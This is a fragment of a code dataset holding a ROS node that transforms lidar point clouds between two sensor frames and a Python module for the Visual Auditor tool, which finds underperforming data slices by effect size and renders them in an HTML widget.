"tqdm.trange", "line_number": 982, "usage_type": "call"}, {"api_name": "time.time", "line_number": 983, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 989, "usage_type": "call"}, {"api_name": "torch.randperm", "line_number": 995, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 1001, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 1003, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1007, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1012, "usage_type": "call"}, {"api_name": "torch.meshgrid", "line_number": 1013, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 1014, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 1015, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1020, "usage_type": "call"}, {"api_name": "torch.meshgrid", "line_number": 1020, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 1020, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1023, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 1027, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1059, "usage_type": 
"call"}, {"api_name": "os.path.join", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1065, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 1066, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 1076, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1079, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1079, "usage_type": "attribute"}, {"api_name": "imageio.mimwrite", "line_number": 1080, "usage_type": "call"}, {"api_name": "imageio.mimwrite", "line_number": 1081, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1081, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1091, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1091, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1092, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 1094, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1095, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 1102, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 1102, "usage_type": "attribute"}, {"api_name": "torch.set_default_tensor_type", "line_number": 1150, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1157, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 1157, "usage_type": "attribute"}]}
+{"seq_id": "69875777048", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom __future__ import division\n\n# Python imports\nimport numpy as np\nimport scipy.io as sio\nimport os, sys, time\n\n# ROS imports\nimport rospy\nimport ros_numpy\n# tf imports \nimport tf \nfrom tf import transformations\nimport std_msgs.msg\nfrom rospkg import RosPack\nfrom std_msgs.msg import UInt8\n\nfrom std_msgs.msg import Header\nfrom pyquaternion import Quaternion\nimport sensor_msgs.point_cloud2 as pc2\nfrom sensor_msgs.msg import PointCloud2, PointField\n\nimport pdb\n\npackage = RosPack()\npackage_path = package.get_path('yolov3_pytorch_ros')\n\n\ndef transform_xyz_points(trfm_mat, cloud_array, remove_nans=True, dtype=np.float64):\n    '''Apply a 4x4 transform to the xyz fields of a structured point cloud array, keeping intensity.'''\n    if remove_nans:\n        #pdb.set_trace()\n        mask = np.isfinite(cloud_array['x']) & np.isfinite(cloud_array['y']) & np.isfinite(cloud_array['z']) & np.isfinite(cloud_array['intensity'])\n        cloud_array = cloud_array[mask]\n\n    # now let us transform the points \n    xyz = tuple(np.dot(trfm_mat, np.array([cloud_array['x'], cloud_array['y'], cloud_array['z'], 1.0], dtype=object)))[:3]\n    points = np.zeros(cloud_array.shape + (4,), dtype=dtype)\n    points[...,0] = xyz[0]\n    points[...,1] = xyz[1]\n    points[...,2] = xyz[2]\n    points[...,3] = cloud_array['intensity']\n    # print(\"points: {0} \".format(points))\n\n    return points \n\ndef xyz_array_to_pointcloud2(points_sum, msg_in):\n    '''\n    Create a sensor_msgs.PointCloud2 from an array of points.\n    '''\n    msg = PointCloud2()\n    msg.header.stamp = msg_in.header.stamp\n    msg.header.frame_id = \"rs32\"\n    msg.height = 1 \n    msg.width = points_sum.shape[0]\n    msg.fields = [\n        PointField('x', 0, PointField.FLOAT32, 1),\n        PointField('y', 4, PointField.FLOAT32, 1),\n        PointField('z', 8, PointField.FLOAT32, 1),\n        PointField('intensity', 12, PointField.FLOAT32, 1)\n        ]\n    msg.is_bigendian = False\n    msg.point_step = 16\n    msg.row_step = points_sum.shape[0]\n    msg.is_dense = int(np.isfinite(points_sum).all())\n    msg.data = np.asarray(points_sum, np.float32).tobytes()\n    return msg\n\n# Converter \nclass RS16_to_RS32_TFManager():\n    def __init__(self):\n        # Load input/output topic parameters\n        self.rs16_topic = rospy.get_param('~rs16_topic', '/ns1/rslidar_points')\n        self.rs32_topic = rospy.get_param('~rs32_topic', '/ns2/rslidar_points')\n\n        print(\"we should set default value for the tf: rs16 to rs32 if they are static\")\n        self.trans = (-0.314, -0.0155, -0.261) # x, y, z \n        self.rot_quaternion = (-0.0117, -0.00218, 1.0, -0.00688) # (x, y, z, w)\n        self.trfm_matrix = self.tm_from_trans_rot(self.trans, self.rot_quaternion)\n\n        # Load publisher topics\n        self.pub_pc_rs16_under_rs32_topic = rospy.get_param('~rs16_to_rs32_topic')\n\n        rospy.loginfo(\"Start converting pc in rs16 to rs32\")\n\n        # Define subscribers\n        self.pc_rs16_sub = rospy.Subscriber(self.rs16_topic, PointCloud2, self.rs16_callback, queue_size = 1, buff_size = 2**24)\n        self.pc_rs32_sub = rospy.Subscriber(self.rs32_topic, PointCloud2, self.rs32_callback, queue_size = 1, buff_size = 2**24)\n\n        # Define publishers\n        self.pub_ = rospy.Publisher(self.pub_pc_rs16_under_rs32_topic, PointCloud2, queue_size=10)\n        rospy.loginfo(\"Launched node for tf converter\")\n\n        # tf listener \n        self.listener = tf.TransformListener(rospy.Duration(10.0))\n        # Spin\n        rospy.spin()\n\n    def tm_from_trans_rot(self, translation, rotation):\n        \"\"\"\n        :param translation: translation expressed as a tuple (x,y,z)\n        :param rotation: rotation quaternion expressed as a tuple (x,y,z,w)\n        :return: a :class:`numpy.matrix` 
4x4 representation of the transform \n        Converts a transformation from :class:`tf.Transformer` into a representation as a 4x4 matrix.\n        \"\"\"\n        return np.dot(transformations.translation_matrix(translation), transformations.quaternion_matrix(rotation))\n\n    def rs16_callback(self, msg):\n        # related data info \n        msg_cloud = ros_numpy.point_cloud2.pointcloud2_to_array(msg) # msg is of type pointcloud2 \n        # transformed data \n        # monitor tf to get the transformation matrix \n        try:\n            (trans,rot_quaternion) = self.listener.lookupTransform('rs16', 'rs32', rospy.Time(0))\n            # print(\"trans: {0}\".format(trans)) \n            # print(\"rot: {0}\".format(rot_quaternion))\n            # make transformation matrix \n            trfm_matrix = self.tm_from_trans_rot(trans,rot_quaternion)\n            trans_points = transform_xyz_points(trfm_matrix, msg_cloud, True) # size: N x 4 (last row is (0, 0, 0, 1)), so it will maintain its intensity, format: (x, y, z, intensity)\n            \n        except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n            # set it to default value \n            print(\"using default value since the transform is static for the two lidars\")\n            # use default value \n            trans_points = transform_xyz_points(self.trfm_matrix, msg_cloud, True) # size: N x 4 (last row is (0, 0, 0, 1)), so it will maintain its intensity, format: (x, y, z, intensity)\n\n        # msg is passed in to set the meta information \n        msg_transformed = xyz_array_to_pointcloud2(trans_points, msg)\n        self.pub_.publish(msg_transformed)\n\n    def rs32_callback(self, msg):\n        pass \n\nif __name__==\"__main__\":\n    # Initialize node\n    rospy.init_node(\"RS16_to_RS32_TFManager_Node\")\n\n    dm = RS16_to_RS32_TFManager()\n\n", "repo_name": "eriche2016/YOLOV3_In_ROS", "sub_path": "src/yolov3_det_pytorch_ros/src/convert_pc_rs16_to_rs32.py", "file_name": "convert_pc_rs16_to_rs32.py", "file_ext": "py", "file_size_in_byte": 5549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rospkg.RosPack", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.isfinite", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 55, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 61, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 62, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 63, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 63, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 64, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.isfinite", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rospy.get_param", "line_number": 77, "usage_type": "call"}, {"api_name": 
"rospy.get_param", "line_number": 78, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 86, "usage_type": "call"}, {"api_name": "rospy.loginfo", "line_number": 88, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 91, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 91, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 92, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 92, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 95, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 95, "usage_type": "argument"}, {"api_name": "rospy.loginfo", "line_number": 96, "usage_type": "call"}, {"api_name": "tf.TransformListener", "line_number": 99, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 99, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 110, "usage_type": "call"}, {"api_name": "tf.transformations.translation_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "tf.transformations", "line_number": 110, "usage_type": "name"}, {"api_name": "tf.transformations.quaternion_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "ros_numpy.point_cloud2.pointcloud2_to_array", "line_number": 114, "usage_type": "call"}, {"api_name": "ros_numpy.point_cloud2", "line_number": 114, "usage_type": "attribute"}, {"api_name": "rospy.Time", "line_number": 118, "usage_type": "call"}, {"api_name": "tf.LookupException", "line_number": 125, "usage_type": "attribute"}, {"api_name": "tf.ConnectivityException", "line_number": 125, "usage_type": "attribute"}, {"api_name": "tf.ExtrapolationException", "line_number": 125, "usage_type": "attribute"}, {"api_name": "rospy.init_node", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "37545802102", "text": "from IPython.display import display_html\nimport html\nimport random\nimport pkgutil\nimport codecs\nimport json\nimport numpy as np\nimport pandas as pd\nimport functools\nimport copy\nimport concurrent.futures\nfrom sklearn.metrics import log_loss\nfrom scipy import stats\nimport math\n\ndef t_testing(sample_a, reference, alpha=0.05):\n ''' Unpaired two-sample (Welch's) t-test '''\n mu, s, n = reference[0], reference[1], reference[2]\n sample_b_mean = (mu*n - np.sum(sample_a))/(n-len(sample_a))\n sample_b_var = (s**2*(n-1) - np.std(sample_a)**2*(len(sample_a)-1))/(n-len(sample_a)-1)\n\n t = np.mean(sample_a) - sample_b_mean\n t /= math.sqrt( np.var(sample_a)/len(sample_a) + sample_b_var/(n-len(sample_a)) )\n\n prob = stats.norm.cdf(t)\n return prob\n \n\ndef effect_size(sample_a, reference):\n mu, s, n = reference[0], reference[1], reference[2]\n if n-len(sample_a) == 0:\n return 0\n sample_b_mean = (mu*n - np.sum(sample_a))/(n-len(sample_a))\n sample_b_var = (s**2*(n-1) - np.std(sample_a)**2*(len(sample_a)-1))/(n-len(sample_a)-1)\n if sample_b_var < 0:\n sample_b_var = 0.\n\n diff = np.mean(sample_a) - sample_b_mean\n diff /= math.sqrt( (np.std(sample_a) + math.sqrt(sample_b_var))/2. )\n return diff\n\nclass Slice:\n def __init__(self, filters, data_idx):\n self.filters = filters\n self.data_idx = data_idx\n self.size = len(data_idx)\n self.effect_size = None\n self.metric = None\n\n def get_filter(self):\n return self.filters\n\n def set_filter(self, filters):\n self.filters = filters\n\n def set_metric(self, metric):\n self.metric = metric\n\n def set_effect_size(self, effect_size):\n self.effect_size = effect_size\n\n def union(self, s):\n if set(self.filters.keys()) == set(s.filters.keys()):\n for k in self.filters.keys():\n self.filters[k] = self.filters[k] + s.filters[k]\n else:\n return False\n\n idx = self.data_idx.difference(s.data_idx)\n self.data_idx = idx.append(s.data_idx)\n self.size = len(self.data_idx)\n\n return True\n\n def intersect(self, s):\n for k, v in list(s.filters.items()):\n if k not in self.filters:\n self.filters[k] = v\n else:\n for condition in s.filters[k]:\n if condition not in self.filters[k]:\n self.filters[k].append(condition)\n\n idx = self.data_idx.intersection(s.data_idx)\n self.data_idx = idx\n self.size = len(self.data_idx)\n\n return True\n\n def __str__(self):\n slice_desc = ''\n for k, v in list(self.filters.items()):\n slice_desc += '%s:%s ' % (k, v)\n return slice_desc\n\n\nclass SliceFinder:\n def __init__(self, model, data):\n self.model = model\n self.data = data\n self.slices = []\n self.samples = {}\n\n def find_slice(self, k=50, epsilon=0.2, alpha=0.05, degree=3, risk_control=True, max_workers=1):\n ''' Find interesting slices '''\n ''' risk_control parameter is obsolete; we do post processing for it '''\n assert k > 0, 'Number of recommendation k should be greater than 0'\n\n metrics_all = self.evaluate_model(self.data)\n reference = (np.mean(metrics_all), np.std(\n metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n print('degree %s' % i)\n # degree 1~3 feature crosses\n print('crossing')\n if i == 1:\n candidates = self.slicing()\n else:\n candidates = self.crossing(uninteresting, i)\n print('effect size filtering')\n interesting, uninteresting_ = self.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n 
print('sorting')\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n recommendations = slices[:k]\n\n self.save_slices_to_file(recommendations, reference[0], 'slices.json')\n self.compute_overlapping_samples(recommendations, 'overlapping_samples.json')\n self.count_common_samples('common_samples.json')\n \n return recommendations\n\n def save_slices_to_file(self, recommendations, model_average, filename):\n slices = []\n for s in recommendations:\n slice = {}\n description = ''\n for i in range(len(s.get_filter().keys())):\n if (i > 0):\n description += ', '\n description += str(list(s.get_filter().keys())[i]) + ': ' + str(list(s.get_filter().values())[i][0][0])\n slice[description] = {\n \"slice\": description,\n \"effect_size\": s.effect_size,\n \"metric\": s.metric,\n \"size\": s.size,\n \"degree\": len(s.get_filter().keys()),\n \"data_idx\": list(s.data_idx)\n }\n slices.append(slice)\n data = {}\n self.slices = slices\n data[\"data\"] = slices\n data[\"model\"] = model_average\n \n if (filename == None):\n return json.dumps(data)\n\n with open(filename, 'w') as f:\n json.dump(data, f)\n \n return json.dumps(data)\n\n def compute_overlapping_samples(self, recommendations, filename):\n sampleDict = {}\n for s in recommendations:\n sliceSet = set()\n description = ''\n keyList = list(s.get_filter().keys())\n valueList = list(s.get_filter().values())\n for i in range(len(s.get_filter().keys())):\n if (i > 0):\n description += ', '\n description += str(keyList[i]) + ': ' + str(valueList[i][0][0])\n for i in range(len(s.get_filter().keys())):\n for index, row in self.data[0].iterrows():\n for key in keyList:\n if row[key] == valueList[i][0][0]:\n sliceSet.add(index)\n sampleDict[description] = sliceSet\n for key in sampleDict.keys():\n sampleDict[key] = list(sampleDict[key])\n self.samples=sampleDict\n\n if (filename == None):\n return json.dumps(sampleDict)\n\n with open(filename, \"w\") as outfile:\n json.dump(sampleDict, outfile)\n\n return json.dumps(sampleDict)\n \n def count_common_samples(self, filename):\n commonSamples = {}\n for s1 in range(0, len(self.slices) - 1):\n for s2 in range(1, len(self.slices)):\n slice1 = list(self.slices[s1].keys())[0]\n slice2 = list(self.slices[s2].keys())[0]\n arr1 = self.samples[slice1]\n arr2 = self.samples[slice2]\n if (arr1 is None or arr2 is None):\n return 0\n random.shuffle(arr1)\n arr1 = arr1[0:2000]\n count = len([value for value in arr1 if value in arr2])\n commonSamples[slice1 + '-' + slice2] = count\n commonSamples[slice2 + '-' + slice1] = count\n\n if (filename == None):\n return json.dumps(commonSamples)\n\n with open(filename, \"w\") as outfile:\n json.dump(commonSamples, outfile)\n \n return json.dumps(commonSamples)\n\n def slicing(self):\n ''' Generate base slices '''\n X, y = self.data[0], self.data[1]\n n, m = X.shape[0], X.shape[1]\n\n slices = []\n for col in X.columns:\n uniques, counts = np.unique(X[col], return_counts=True)\n if len(uniques) == n:\n continue\n if len(uniques) > n/2.:\n bin_edges = self.binning(X[col], n_bin=10)\n for i in range(len(bin_edges)-1):\n data_idx = X[np.logical_and(\n bin_edges[i] <= X[col], X[col] < bin_edges[i+1])].index\n s = Slice(\n {col: [[bin_edges[i], bin_edges[i+1]]]}, data_idx)\n slices.append(s)\n else:\n for v in uniques:\n data_idx = X[X[col] == v].index\n s = Slice({col: [[v]]}, data_idx)\n slices.append(s)\n\n return slices\n\n def crossing(self, slices, degree):\n ''' Cross uninteresting slices together '''\n crossed_slices = []\n for i in range(len(slices)-1):\n for j 
in range(i+1, len(slices)):\n if len(slices[i].filters) + len(slices[j].filters) == degree:\n slice_ij = copy.deepcopy(slices[i])\n slice_ij.intersect(slices[j])\n crossed_slices.append(slice_ij)\n return crossed_slices\n\n def evaluate_model(self, data, metric=log_loss, reverse=False):\n ''' evaluate model on a given data (X, y), example by example '''\n X, y = copy.deepcopy(data[0]), copy.deepcopy(data[1])\n X['Label'] = y\n X = X.dropna()\n y = X['Label']\n X = X.drop(['Label'], axis=1)\n\n y_p = self.model.predict_proba(X)\n y_pred = self.model.predict(X)\n y_actual = np.array(y)\n y_pred = list(map(functools.partial(np.expand_dims, axis=0), y_pred))\n y_p = list(map(functools.partial(np.expand_dims, axis=0), y_p))\n y = list(map(functools.partial(np.expand_dims, axis=0), y))\n if metric == log_loss:\n if (reverse):\n l = map(functools.partial(\n log_loss, labels=self.model.classes_), y, y_p)\n return list(map(lambda x: -1 * x, l))\n return list(map(functools.partial(metric, labels=self.model.classes_), y, y_p))\n\n def filter_by_effect_size(self, slices, reference, epsilon=0.5, max_workers=1, alpha=0.05, risk_control=True):\n ''' Filter slices by the minimum effect size '''\n filtered_slices = []\n rejected = []\n\n with concurrent.futures.ProcessPoolExecutor(max_workers=max_workers) as executor:\n batch_jobs = []\n for s in slices:\n if s.size == 0:\n continue\n batch_jobs.append(executor.submit(\n self.eff_size_job, s, reference, alpha))\n for job in concurrent.futures.as_completed(batch_jobs):\n if job.cancelled():\n continue\n elif job.done():\n s = job.result()\n if s.effect_size >= epsilon:\n filtered_slices.append(s)\n else:\n rejected.append(s)\n return filtered_slices, rejected\n\n def eff_size_job(self, s, reference, alpha=0.05):\n data = (self.data[0].loc[s.data_idx], self.data[1].loc[s.data_idx])\n m_slice = self.evaluate_model(data)\n eff_size = effect_size(m_slice, reference)\n\n s.set_metric(np.mean(m_slice))\n s.set_effect_size(eff_size)\n return s \n\n def merge_slices(self, slices, reference, epsilon):\n ''' Merge slices with the same filter attributes\n if the minimum effect size condition is satisfied '''\n merged_slices = []\n\n sorted_slices = sorted(\n slices, key=lambda x: x.effect_size, reverse=True)\n taken = []\n for i in range(len(sorted_slices)-1):\n if i in taken:\n continue\n\n s_ = copy.deepcopy(sorted_slices[i])\n taken.append(i)\n for j in range(i, len(sorted_slices)):\n if j in taken:\n continue\n\n prev = copy.deepcopy(s_)\n if s_.union(sorted_slices[j]):\n m_s_ = self.evaluate_model(\n (self.data[0].loc[s_.data_idx], self.data[1].loc[s_.data_idx]))\n eff_size = effect_size(m_s_, reference)\n if eff_size >= epsilon:\n s_.set_effect_size(eff_size)\n taken.append(j)\n else:\n s_ = prev\n\n merged_slices.append(s_)\n\n return merged_slices\n\n def filter_by_significance(self, slices, reference, alpha, max_workers=10):\n ''' Return significant slices '''\n filtered_slices, bf_filtered_slices, ai_filtered_slices = [], [], []\n rejected, bf_rejected, ai_rejected = [], [], []\n\n test_results = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n batch_jobs = dict()\n for s in slices:\n if s.size == 0:\n continue\n\n data = (self.data[0].loc[s.data_idx],\n self.data[1].loc[s.data_idx])\n batch_jobs[executor.submit(\n self.significance_job, data, reference, alpha, len(slices))] = s\n\n for job in concurrent.futures.as_completed(batch_jobs):\n if job.cancelled():\n continue\n elif job.done():\n 
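# Added note: collect (slice, p-value) pairs; below they are screened with a plain alpha cut, a Bonferroni correction, and alpha-investing.\n                    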
test_results.append((batch_jobs[job], job.result()))\n\n alpha_wealth = alpha\n for r in test_results:\n s, p = r[0], r[1]\n if p <= alpha:\n filtered_slices.append(s)\n else:\n rejected.append(s)\n if p <= alpha/len(test_results):\n bf_filtered_slices.append(s)\n else:\n bf_rejected.append(s)\n if p <= alpha_wealth:\n ai_filtered_slices.append(s)\n alpha_wealth += alpha\n else:\n ai_rejected.append(s)\n alpha_wealth -= alpha/(1.-alpha)\n\n return filtered_slices, rejected, bf_filtered_slices, bf_rejected, ai_filtered_slices, ai_rejected\n\n def significance_job(self, data, reference, alpha, n_slices, ):\n m_slice = self.evaluate_model(data)\n test_result = t_testing(m_slice, reference, alpha)\n return test_result\n\n def binning(self, col, n_bin=20):\n ''' Equi-height binning '''\n bin_edges = stats.mstats.mquantiles(\n col, np.arange(0., 1.+1./n_bin, 1./n_bin))\n return bin_edges\n \n def find_slices_and_visualize(self, k=50, epsilon=0.2, alpha=0.05, degree=3, risk_control=True, max_workers=1):\n ''' Find interesting slices and generate visual auditor '''\n assert k > 0\n\n metrics_all = self.evaluate_model(self.data)\n reference = (np.mean(metrics_all), np.std(\n metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n print('degree %s' % i)\n print('crossing')\n if i == 1:\n candidates = self.slicing()\n else:\n candidates = self.crossing(uninteresting, i)\n print('effect size filtering')\n interesting, uninteresting_ = self.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n print('sorting')\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n recommendations = slices[:k]\n\n slices_str = self.save_slices_to_file(recommendations, reference[0], None)\n samples_str = self.compute_overlapping_samples(recommendations, None)\n common_samples_str = self.count_common_samples(None)\n\n html_file = codecs.open(\"bundle.html\", 'r')\n html_str = html_file.read()\n\n html_str = html_str.replace('{\"model\":\"insert log loss slices\",\"data\":\"insert log loss slices\"}', slices_str)\n html_str = html_str.replace('{\"model\":\"insert log loss samples\",\"data\":\"insert log loss samples\"}', samples_str)\n html_str = html_str.replace('{\"data\":\"insert common samples\"}', common_samples_str)\n\n html_str = html.escape(html_str)\n\n iframe_id = 'visual-auditor-iframe-' + str(int(random.random() * 1e8))\n\n iframe = '''\n \n '''.format(html_str, iframe_id)\n\n display_html(iframe, raw=True)\n\n\ndef _make_html():\n \"\"\"\n Function to create an HTML string to bundle Visual Auditor's html, css, and js.\n Args:\n \n Return:\n HTML code\n \"\"\"\n # HTML template for Visual Auditor widget\n html_top = '''Visual Auditor '''\n html_bottom = ''''''\n\n # Read the bundled JS file\n js_string = pkgutil.get_data(__name__, 'visualauditor.js')\n\n # Inject the JS to the html template\n html_str = html_top + \\\n ''''''.format(js_string) + \\\n html_bottom\n\n return html.escape(html_str)\n\n\ndef visualize():\n \"\"\"\n Render Visual Auditor in the output cell.\n \"\"\" \n html_file = codecs.open(\"bundle.html\", 'r')\n html_str = html_file.read()\n\n slices_file = codecs.open(\"slices.json\", 'r')\n slices_str = slices_file.read()\n html_str = html_str.replace('{\"model\":\"insert log loss slices\",\"data\":\"insert log loss slices\"}', slices_str)\n\n samples_file = 
codecs.open(\"overlapping_samples.json\", 'r')\n samples_str = samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert log loss samples\"}', samples_str)\n\n common_samples_file = codecs.open(\"common_samples.json\", 'r')\n common_samples_str = common_samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert common samples\"}', common_samples_str)\n\n reverse_slices_file = codecs.open(\"reverse_slices.json\", 'r')\n reverse_slices_str = reverse_slices_file.read()\n html_str = html_str.replace('{\"model\":\"insert reverse log loss slices\",\"data\":\"insert reverse log loss slices\"}', reverse_slices_str)\n\n reverse_samples_file = codecs.open(\"reverse_overlapping_samples.json\", 'r')\n reverse_samples_str = reverse_samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert reverse log loss samples\"}', reverse_samples_str)\n\n reverse_common_samples_file = codecs.open(\"reverse_common_samples.json\", 'r')\n reverse_common_samples_str = reverse_common_samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert reverse common samples\"}', reverse_common_samples_str)\n\n html_str = html.escape(html_str)\n\n # Randomly generate an ID for the iframe to avoid collision\n iframe_id = 'visual-auditor-iframe-' + str(int(random.random() * 1e8))\n\n iframe = '''\n \n '''.format(html_str, iframe_id)\n\n # Display the iframe\n display_html(iframe, raw=True)\n\n\ndef find_slices_and_visualize(model, data, k=50, epsilon=0.2, alpha=0.05, degree=3, risk_control=True, max_workers=1, precompute=True, prefix=''):\n ''' Find interesting slices and generate visual auditor '''\n slices_str = 'test'\n samples_str = ''\n common_samples_str = ''\n reverse_slices_str = ''\n reverse_samples_str = ''\n reverse_common_samples_str = ''\n\n if (precompute == False):\n sf = SliceFinder(model, data)\n assert k > 0\n\n metrics_all = sf.evaluate_model(sf.data, metric=log_loss, reverse=False)\n reference = (np.mean(metrics_all), np.std(metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n if i == 1:\n candidates = sf.slicing()\n else:\n candidates = sf.crossing(uninteresting, i)\n interesting, uninteresting_ = sf.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n recommendations = slices[:k]\n\n slices_str = sf.save_slices_to_file(recommendations, reference[0], prefix + 'slices.json')\n samples_str = sf.compute_overlapping_samples(recommendations, prefix + 'overlapping_samples.json')\n common_samples_str = sf.count_common_samples(prefix + 'common_samples.json')\n\n metrics_all = sf.evaluate_model(sf.data, metric=log_loss, reverse=True)\n reference = (np.mean(metrics_all), np.std(metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n if i == 1:\n candidates = sf.slicing()\n else:\n candidates = sf.crossing(uninteresting, i)\n interesting, uninteresting_ = sf.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n reverse_recommendations = slices[:k]\n\n reverse_slices_str = sf.save_slices_to_file(reverse_recommendations, reference[0], prefix + 'reverse_slices.json')\n 
reverse_samples_str = sf.compute_overlapping_samples(reverse_recommendations, prefix + 'reverse_overlapping_samples.json')\n reverse_common_samples_str = sf.count_common_samples(prefix + 'reverse_common_samples.json')\n else:\n slices_file = codecs.open(prefix + \"slices.json\", 'r')\n slices_str = slices_file.read()\n\n samples_file = codecs.open(prefix + \"overlapping_samples.json\", 'r')\n samples_str = samples_file.read()\n\n common_samples_file = codecs.open(prefix + \"common_samples.json\", 'r')\n common_samples_str = common_samples_file.read()\n\n reverse_slices_file = codecs.open(prefix + \"reverse_slices.json\", 'r')\n reverse_slices_str = reverse_slices_file.read()\n\n reverse_samples_file = codecs.open(prefix + \"reverse_overlapping_samples.json\", 'r')\n reverse_samples_str = reverse_samples_file.read()\n\n reverse_common_samples_file = codecs.open(prefix + \"reverse_common_samples.json\", 'r')\n reverse_common_samples_str = reverse_common_samples_file.read()\n\n html_file = codecs.open(\"bundle.html\", 'r')\n html_str = html_file.read()\n\n html_str = html_str.replace('{\"model\":\"insert log loss slices\",\"data\":\"insert log loss slices\"}', slices_str)\n html_str = html_str.replace('{\"data\":\"insert log loss samples\"}', samples_str)\n html_str = html_str.replace('{\"data\":\"insert common samples\"}', common_samples_str)\n html_str = html_str.replace('{\"model\":\"insert reverse log loss slices\",\"data\":\"insert reverse log loss slices\"}', reverse_slices_str)\n html_str = html_str.replace('{\"data\":\"insert reverse log loss samples\"}', reverse_samples_str)\n html_str = html_str.replace('{\"data\":\"insert reverse common samples\"}', reverse_common_samples_str)\n\n if (prefix == 'adult_'):\n features_str = \"[\\\"Age\\\", \\\"Workclass\\\", \\\"Education\\\", \\\"Marital Status\\\", \\\"Occupation\\\", \\\"Relationship\\\", \\\"Race\\\", \\\"Sex\\\", \\\"Capital Gain\\\", \\\"Capital 